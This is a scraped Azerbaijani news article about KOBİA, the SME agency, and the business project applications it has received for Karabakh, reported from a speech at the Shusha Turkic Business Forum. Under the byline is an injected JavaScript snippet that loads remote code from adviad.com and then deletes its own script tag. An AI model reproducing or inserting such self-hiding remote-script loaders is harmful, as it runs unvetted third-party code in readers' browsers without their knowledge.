KOBİA Qarabağda biznes qurmaq istəyən sahibkarların biznes layihələri qəbul edib

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

“Azərbaycanın mədəniyyət incisi və zəfər simvolu sayılan, 270 illiyini qeyd etdiyimiz Şuşa şəhərində keçirilən forumun Türk Dövlətləri Təşkilatı ölkələri arasında qarşılıqlı əlaqələrin güclənməsi, eləcə də Qarabağın bərpası prosesində dost ölkələrin resurslarının səfərbər edilməsi və səylərin birləşdirilməsi baxımından əhəmiyyətli olacağını düşünürəm”.

Oxu.Az-ın məlumatına görə, bunu Kiçik və Orta Biznesin İnkişafı Agentliyinin İdarə Heyətinin sədri Orxan Məmmədov sentyabrın 16-da Şuşa şəhərində Qarabağ regionunun bərpası və inkişafına həsr olunmuş Şuşa Türk Biznes Forumunda çıxışı zamanı bildirib.

Onun sözlərinə görə, KOBİA həm çoxtərəfli platforma, həm də ikitərəfli formatda Türk Dövlətləri Təşkilatına üzv və müşahidəçi ölkələrin müvafiq qurumları ilə sıx əməkdaşlıq edir. Ötən dövrdə Türkiyə, Qazaxıstan, Özbəkistan və Macarıstanın aidiyyəti təşkilatları ilə anlaşma memorandumları imzalanıb, qarşılıqlı biznes missiyalar, forumlar və işgüzar görüşlər təşkil edilib:

“2020-ci ildə Vətən müharibəsi nəticəsində Ali Baş komandan İlham Əliyevin iradəsi və rəşadətli ordumuzun qəhrəmanlığı hesabına qazanılmış qələbə isə əlaqələrimizin daha da inkişaf etdirilməsi və şaxələndirilməsi üçün yeni perspektivlər yaratmış oldu. Bu həm Zəngəzur dəhlizi vasitəsilə ölkələrimiz arasında yeni kommunikasiyaların yaradılması, həm də zəngin təbii ehtiyatlara, əlverişli coğrafi mövqeyə və böyük potensiala malik Qarabağ bölgəsinin inkişafında iştirak ilə bağlıdır.    

KOBİA Azərbaycan dövlətinin Qarabağa dair inkişaf konsepsiyasına uyğun olaraq işğaldan azad edilmiş ərazilərə investisiya qoyuluşu və biznes layihələrinin reallaşdırılması ilə bağlı məsələləri qarşıdakı dövrdə strateji fəaliyyət gündəliyinin prioritet istiqamətlərindən birinə çevirib. Bu məqsədlə hazırda tərəfimizdən üç istiqamətdə işlər aparılır: Qarabağın investisiya potensialının geniş auditoriya kütləsinə tanıdılması, azad olunmuş ərazilərdə bizneslərin yaradılması ilə bağlı müraciətlərin qəbulu və ilkin biznes infrastrukturunun qurulmasına dəstək. 

Agentlik tərəfindən qeyd edilən sahələrdə müvafiq tədbirlər həyata keçirilir. Hələ 2020-ci ilin noyabr ayında, Vətən müharibəsi başa çatdıqdan az müddət sonra “MUSİAD Expo 2020” sərgisində KOBİA-nın təşkilatçılığı ilə “Qarabağ Azərbaycandır” stendi fəaliyyət göstərib. Qarabağın investisiya potensialı beynəlxalq səviyyədə KOBİA tərəfindən ilk dəfə məhz qardaş Türkiyədə nümayiş olunub. Eyni zamanda, 2021-ci ildə KOBİA-nın təşkilatçılığı ilə baş tutmuş IBF Beynəlxalq Biznes Forumu və Mədəniyyət və İnvestisiya Sammitində, bu ilin mart ayında Birləşmiş Ərəb Əmirliklərinin Dubay şəhərində keçirilmiş İllik İnvestisiya Toplantısı çərçivəsində təşkil olunmuş sərgidə, eləcə də digər yerli və beynəlxalq tədbirlərdə işğaldan azad edilmiş Azərbaycan ərazilərinin potensialı və investisiya qoyuluşu imkanları nümayiş olunub”.

O qeyd edib ki, işğaldan azad edilmiş ərazilərin zəngin iqtisadi və investisiya potensialı bu ərazilərdə yeni biznes layihələrinin həyata keçirilməsi və investisiyaların cəlb edilməsinə şərait yaradır:

“Qələbədən dərhal sonra KOBİA Qarabağda biznes qurmaq istəyən sahibkarların, o cümlədən xarici iş adamlarının biznes layihələrinin qəbuluna başlayıb. Müraciətlərin intensivliyi və həcmi yerli və xarici investorların Qarabağda biznes fəaliyyətinə marağının yüksək olduğunu göstərir. Bu günə qədər 1300-ə yaxın müraciət müvafiq formaya uyğun qeydə alınmışdır.

Onların da 460-dan çoxu xarici müraciətdir və 40-a yaxın ölkə daxil olmaqla geniş coğrafi dairəni əhatə edir. Xarici müraciətlərin yarıdan çoxu Türk Dövlətləri Təşkilatına üzv və müşahidəçi ölkələrin payına düşür. Onların sırasında Türkiyə, Qazaxıstan, Özbəkistan, Türkmənistan və Macarıstan yer alır. Daxil olmuş layihələr əsasən ticarət, xidmət, inşaat, sənaye, kənd təsərrüfatı, mədəniyyət, təhsil, nəqliyyat, logistika və digər sahələri əhatə edir”.

İlhamə Əbülfət

Oxu.az

Bu yazılara da göz atın...